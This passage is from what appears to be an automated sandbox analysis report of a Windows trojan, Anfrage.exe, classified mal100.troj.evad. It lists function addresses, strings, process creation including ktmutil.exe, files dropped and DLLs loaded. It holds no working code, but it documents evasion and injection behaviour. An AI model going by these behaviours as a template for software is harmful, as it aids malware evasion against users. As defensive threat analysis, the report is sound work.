            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648F43F7_2_3648F43F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364875717_2_36487571
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364995C37_2_364995C3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646D5B07_2_3646D5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A07_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C07_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648132D7_2_3648132D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD34C7_2_363BD34C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3641739A7_2_3641739A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F0CC7_2_3647F0CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364870E97_2_364870E9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648F0E07_2_3648F0E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D70C07_2_363D70C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649B16B7_2_3649B16B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3640516C7_2_3640516C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BF1727_2_363BF172
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DB1B07_2_363DB1B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D9EB07_2_363D9EB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648FF097_2_3648FF09
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1F927_2_363D1F92
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36393FD27_2_36393FD2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36393FD57_2_36393FD5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648FFB17_2_3648FFB1
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36449C327_2_36449C32
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648FCF27_2_3648FCF2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36481D5A7_2_36481D5A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36487D737_2_36487D73
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D3D407_2_363D3D40
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EFDC07_2_363EFDC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648FA497_2_3648FA49
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36487A467_2_36487A46
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36443A6C7_2_36443A6C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647DAC67_2_3647DAC6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36415AA07_2_36415AA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36471AA37_2_36471AA3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646DAAC7_2_3646DAAC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648FB767_2_3648FB76
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36445BF07_2_36445BF0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3640DBF97_2_3640DBF9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EFB807_2_363EFB80
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D8007_2_3643D800
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D38E07_2_363D38E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364659107_2_36465910
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D99507_2_363D9950
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB9507_2_363EB950
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EC6E07_2_363EC6E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D07707_2_363D0770
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F47507_2_363F4750
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CC7C07_2_363CC7C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364824467_2_36482446
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364744207_2_36474420
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647E4F67_2_3647E4F6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D05357_2_363D0535
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364905917_2_36490591
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364702747_2_36470274
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364502C07_2_364502C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648A3527_2_3648A352
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364903E67_2_364903E6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DE3F07_2_363DE3F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364620007_2_36462000
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364581587_2_36458158
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C01007_2_363C0100
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646A1187_2_3646A118
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364881CC7_2_364881CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364901AA7_2_364901AA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364841A27_2_364841A2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D0E597_2_363D0E59
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648EE267_2_3648EE26
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648EEDB7_2_3648EEDB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E2E907_2_363E2E90
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648CE937_2_3648CE93
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36444F407_2_36444F40
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F0F307_2_363F0F30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36412F287_2_36412F28
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36472F307_2_36472F30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DCFE07_2_363DCFE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644EFA07_2_3644EFA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C2FC87_2_363C2FC8
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D0C007_2_363D0C00
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C0CF27_2_363C0CF2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36470CB57_2_36470CB5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DAD007_2_363DAD00
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646CD1F7_2_3646CD1F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E8DBF7_2_363E8DBF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CADE07_2_363CADE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CEA807_2_363CEA80
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648AB407_2_3648AB40
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36486BD77_2_36486BD7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DA8407_2_363DA840
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D28407_2_363D2840
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B68B87_2_363B68B8
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FE8F07_2_363FE8F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E69627_2_363E6962
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D29A07_2_363D29A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649A9A67_2_3649A9A6
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F963D48_2_02F963D4
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F983A88_2_02F983A8
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F9EB188_2_02F9EB18
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F9EB1A8_2_02F9EB1A
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02FA08C88_2_02FA08C8
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F981888_2_02F98188
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F9817F8_2_02F9817F
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02FB6FA88_2_02FB6FA8
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F964288_2_02F96428
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeCode function: 8_2_02F8C5398_2_02F8C539
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FA3529_2_033FA352
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_034003E69_2_034003E6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0334E3F09_2_0334E3F0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033E02749_2_033E0274
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033C02C09_2_033C02C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033DA1189_2_033DA118
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033301009_2_03330100
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033C81589_2_033C8158
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F41A29_2_033F41A2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_034001AA9_2_034001AA
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F81CC9_2_033F81CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033D20009_2_033D2000
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033407709_2_03340770
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033647509_2_03364750
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0333C7C09_2_0333C7C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0335C6E09_2_0335C6E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033405359_2_03340535
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_034005919_2_03400591
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033E44209_2_033E4420
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F24469_2_033F2446
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033EE4F69_2_033EE4F6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FAB409_2_033FAB40
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F6BD79_2_033F6BD7
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0333EA809_2_0333EA80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033569629_2_03356962
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033429A09_2_033429A0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0340A9A69_2_0340A9A6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0334A8409_2_0334A840
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033428409_2_03342840
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033268B89_2_033268B8
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0336E8F09_2_0336E8F0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03360F309_2_03360F30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033E2F309_2_033E2F30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03382F289_2_03382F28
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033B4F409_2_033B4F40
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033BEFA09_2_033BEFA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0334CFE09_2_0334CFE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03332FC89_2_03332FC8
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FEE269_2_033FEE26
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03340E599_2_03340E59
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03352E909_2_03352E90
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FCE939_2_033FCE93
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FEEDB9_2_033FEEDB
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033DCD1F9_2_033DCD1F
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0334AD009_2_0334AD00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03358DBF9_2_03358DBF
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0333ADE09_2_0333ADE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03340C009_2_03340C00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033E0CB59_2_033E0CB5
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03330CF29_2_03330CF2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F132D9_2_033F132D
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0332D34C9_2_0332D34C
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0338739A9_2_0338739A
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033452A09_2_033452A0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033E12ED9_2_033E12ED
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0335B2C09_2_0335B2C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0340B16B9_2_0340B16B
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0332F1729_2_0332F172
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0337516C9_2_0337516C
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0334B1B09_2_0334B1B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F70E99_2_033F70E9
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FF0E09_2_033FF0E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033EF0CC9_2_033EF0CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033470C09_2_033470C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FF7B09_2_033FF7B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033856309_2_03385630
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F16CC9_2_033F16CC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F75719_2_033F7571
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_034095C39_2_034095C3
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033DD5B09_2_033DD5B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FF43F9_2_033FF43F
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033314609_2_03331460
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FFB769_2_033FFB76
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0335FB809_2_0335FB80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033B5BF09_2_033B5BF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0337DBF99_2_0337DBF9
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033B3A6C9_2_033B3A6C
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FFA499_2_033FFA49
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F7A469_2_033F7A46
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033DDAAC9_2_033DDAAC
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03385AA09_2_03385AA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033E1AA39_2_033E1AA3
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033EDAC69_2_033EDAC6
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033D59109_2_033D5910
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033499509_2_03349950
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0335B9509_2_0335B950
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033AD8009_2_033AD800
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033438E09_2_033438E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FFF099_2_033FFF09
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FFFB19_2_033FFFB1
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03341F929_2_03341F92
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03303FD29_2_03303FD2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03303FD59_2_03303FD5
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03349EB09_2_03349EB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F7D739_2_033F7D73
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033F1D5A9_2_033F1D5A
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03343D409_2_03343D40
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0335FDC09_2_0335FDC0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033B9C329_2_033B9C32
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033FFCF29_2_033FFCF2
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028D1E509_2_028D1E50
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028CCF909_2_028CCF90
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028CCD679_2_028CCD67
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028CCD709_2_028CCD70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028CB0109_2_028CB010
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028C11219_2_028C1121
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028D37009_2_028D3700
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028D37029_2_028D3702
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028D54B09_2_028D54B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028EBB909_2_028EBB90
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: String function: 3644F290 appears 103 times
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: String function: 363BB970 appears 280 times
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: String function: 36405130 appears 58 times
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: String function: 3643EA12 appears 82 times
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: String function: 36417E54 appears 111 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: String function: 03387E54 appears 111 times
            Source: Anfrage.exeStatic PE information: invalid certificate
            Source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamektmutil.exej% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamektmutil.exej% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000003.2388742992.0000000036147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000002.2511246780.0000000036661000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Anfrage.exe
            Source: Anfrage.exe, 00000007.00000003.2390764590.0000000036309000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Anfrage.exe
            Source: Anfrage.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@5/10@2/2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031A3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004043E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004043E6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar,0_2_004020CD
            Source: C:\Users\user\Desktop\Anfrage.exeFile created: C:\Users\user\AppData\Roaming\secretaryshipsJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeFile created: C:\Users\user\AppData\Local\Temp\nszF4DB.tmpJump to behavior
            Source: Anfrage.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Anfrage.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Anfrage.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Anfrage.exeFile read: C:\Users\user\Desktop\Anfrage.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"
            Source: C:\Users\user\Desktop\Anfrage.exeProcess created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
            Source: C:\Users\user\Desktop\Anfrage.exeProcess created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"Jump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: winhttp.dllJump to behavior
